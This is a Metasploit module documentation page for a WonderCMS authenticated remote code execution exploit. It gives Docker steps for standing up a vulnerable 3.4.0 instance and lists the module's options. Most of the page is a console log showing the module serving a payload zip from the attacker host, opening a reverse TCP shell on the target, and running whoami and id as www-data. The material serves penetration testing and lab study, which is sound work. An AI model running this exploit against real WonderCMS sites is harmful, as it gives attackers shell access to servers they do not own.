documentation/modules/exploit/multi/http/wondercms_rce.md
WonderCMS is a free and open-source Content Management System (CMS). The main advantage is that only one PHP file controls the whole management. Follow next steps to install application:
sudo a2enmod rewritegit clone https://github.com/mablanco/docker-wondercms.gitDockerfile set the version to a vulnerable version: ARG WONDERCMS_VERSION=3.4.0 docker build -t 3.4.0 .docker run -d -p 8980:80 --name wondercms 3.4.0use multi/http/wondercms_rceset PASSWORD [password]set SRVHOST [attacker IP to host payload]set LHOST [attacker IP]set LPORT [attacker PORT]runWonderCMS uses a global password that generated at the application's first run. This is global admin password that controls the whole CMS. This password has to be used in the exploit to get authenticated access.
msf exploit(multi/http/wondercms_rce) > set LHOST 192.168.168.152
LHOST => 192.168.168.152
msf exploit(multi/http/wondercms_rce) > set LPORT 4444
LPORT => 4444
msf exploit(multi/http/wondercms_rce) > exploit
[*] Exploit running as background job 28.
[*] Exploit completed, but no session was created.
msf exploit(multi/http/wondercms_rce) >
[*] Started reverse TCP handler on 192.168.168.152:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target is probably WonderCMS..
[+] The target is vulnerable. Version 3.4.2 is affected
[*] Using URL: http://192.168.168.152:8082/81k4.zip
[*] Received request, sending payload..
[*] Server stopped.
[*] Command shell session 5 opened (192.168.168.152:4444 -> 192.168.168.146:37068) at 2025-04-25 14:46:20 +0200
msf exploit(multi/http/wondercms_rce) > sessions 5
[*] Starting interaction with 5...
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)